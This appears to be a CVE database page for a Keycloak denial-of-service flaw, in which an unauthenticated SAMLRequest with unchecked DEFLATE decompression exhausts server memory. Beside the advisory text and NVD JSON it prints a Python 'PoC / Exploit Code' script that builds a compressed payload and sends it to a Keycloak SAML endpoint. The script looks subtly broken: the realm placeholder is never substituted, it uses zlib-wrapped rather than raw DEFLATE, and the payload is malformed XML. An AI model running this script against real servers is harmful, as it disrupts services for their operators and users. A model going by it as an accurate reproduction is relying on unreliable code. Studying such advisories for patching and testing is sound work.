CVE-2026-2575

Description

A flaw was found in Keycloak. An unauthenticated remote attacker can trigger an application level Denial of Service (DoS) by sending a highly compressed SAMLRequest through the SAML Redirect Binding. The server fails to enforce size limits during DEFLATE decompression, leading to an OutOfMemoryError (OOM) and subsequent process termination. This vulnerability allows an attacker to disrupt the availability of the service.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Keycloak < 25.0.0

Keycloak < 24.0.5

Keycloak < 23.0.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import base64
import zlib
import requests
import time

# Generate highly compressed SAMLRequest for DoS attack
def generate_compressed_saml_request():
    # Create a SAMLRequest with repeated patterns to achieve high compression ratio
    # Using DEFLATE compression which allows extreme compression with repeated data
    large_data = '<samlp:AuthnRequest' + 'A' * 100000 + '</samlp:AuthnRequest>' * 100
    compressed = zlib.compress(large_data.encode(), level=9)
    encoded = base64.b64encode(compressed).decode()
    return encoded

# Target Keycloak SAML endpoint
TARGET_URL = 'https://vulnerable-keycloak.com/auth/realms/{realm}/protocol/saml'
REALM = 'your-realm'

def exploit():
    compressed_request = generate_compressed_saml_request()
    params = {'SAMLRequest': compressed_request}
    
    print(f'[*] Sending compressed SAMLRequest to {TARGET_URL}')
    print(f'[*] Compressed size: {len(compressed_request)} bytes')
    
    try:
        response = requests.get(TARGET_URL, params=params, timeout=10, verify=False)
        print(f'[*] Response status: {response.status_code}')
    except requests.exceptions.RequestException as e:
        print(f'[!] Request failed: {e}')

if __name__ == '__main__':
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-2575
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-2575
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-2575/
[4] VulDB https://vuldb.com/cve/CVE-2026-2575
[5] https://access.redhat.com/errata/RHSA-2026:3947
[6] https://access.redhat.com/errata/RHSA-2026:3948
[7] https://access.redhat.com/security/cve/CVE-2026-2575
[8] https://bugzilla.redhat.com/show_bug.cgi?id=2440149

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-2575", "sourceIdentifier": "[email protected]", "published": "2026-03-18T04:17:16.783", "lastModified": "2026-03-18T14:52:44.227", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak. An unauthenticated remote attacker can trigger an application level Denial of Service (DoS) by sending a highly compressed SAMLRequest through the SAML Redirect Binding. The server fails to enforce size limits during DEFLATE decompression, leading to an OutOfMemoryError (OOM) and subsequent process termination. This vulnerability allows an attacker to disrupt the availability of the service."}, {"lang": "es", "value": "Se encontró una falla en Keycloak. Un atacante remoto no autenticado puede desencadenar una denegación de servicio (DoS) a nivel de aplicación al enviar una SAMLRequest altamente comprimida a través del SAML Redirect Binding. El servidor no aplica límites de tamaño durante la descompresión DEFLATE, lo que lleva a un OutOfMemoryError (OOM) y la subsiguiente terminación del proceso. Esta vulnerabilidad permite a un atacante interrumpir la disponibilidad del servicio."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-409"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:3947", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:3948", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-2575", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2440149", "source": "[email protected]"}]}}